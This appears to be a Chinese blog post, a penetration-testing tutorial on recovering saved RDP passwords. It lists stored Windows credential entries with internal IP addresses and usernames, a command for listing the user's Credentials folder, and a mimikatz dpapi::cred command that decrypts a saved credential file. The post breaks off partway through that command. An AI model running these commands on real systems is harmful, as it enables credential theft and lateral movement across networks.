利用mimikatz查看rdp连接密码【渗透测试】_mimikatz pth rdp

目标: Domain:target=TERMSRV/192.168.100.52
类型: 域密码
用户: admin
本地机器持续时间

目标: LegacyGeneric:target=Adobe User Info(Part2)
类型: 普通 
用户: User DT
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/172.16.1.246
类型: 普通 
用户: administrator
本地机器持续时间

目标: Domain:target=TERMSRV/192.168.100.42
类型: 域密码
用户: admin
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/10.10.40.53
类型: 普通 
用户: lmrsec\tony
本地机器持续时间

目标: LegacyGeneric:target=Adobe User Info(Part1)
类型: 普通 
用户: User DT
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/192.168.100.45
类型: 普通 
用户: administrator
本地机器持续时间

目标: LegacyGeneric:target=Adobe User OS Info(Part1)
类型: 普通 
用户: User OS Info
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/172.16.1.134
类型: 普通 
用户: administrator
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/192.168.100.46
类型: 普通 
用户: administrator
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/10.10.40.54
类型: 普通 
用户: LMRSEC\lmr
本地机器持续时间    

目标: LegacyGeneric:target=TERMSRV/172.16.1.124
类型: 普通 
用户: administrator
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/10.10.20.123
类型: 普通 
用户: pc
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/10.10.40.100
类型: 普通 
用户: lmrsec\tony
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/10.10.40.55
类型: 普通 
用户: LMRSEC\tony
本地机器持续时间        

目标: LegacyGeneric:target=TERMSRV/10.10.40.62
类型: 普通 
用户: MEC0\administrator
本地机器持续时间        

目标: Domain:target=192.168.1.94
类型: 域密码
用户: LEE-PC\admin

目标: Domain:target=10.0.0.152
类型: 域密码
用户: LEE-PC\administrator    

目标: LegacyGeneric:target=chia-user-chia-1.8
类型: 普通 
用户: wallet-user-chia-1.8-0    

目标: Domain:target=PIG
类型: 域密码
用户: LEE-PC\admin


使用命令:dir /a %userprofile%\AppData\Local\Microsoft\Credentials 来查看保存凭据的目录和凭据的值


![](https://img-blog.csdnimg.cn/aa6e78472c574299bba5f40ef7d5dacf.png)


接下来就一个一个实验吧,因为这个下面是凭据的值,不一定哪一个是你要的,需要写工具批量查喽。


例如:



mimikatz “dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D” exit >a.txt



mimikatz(commandline) # dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A3

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值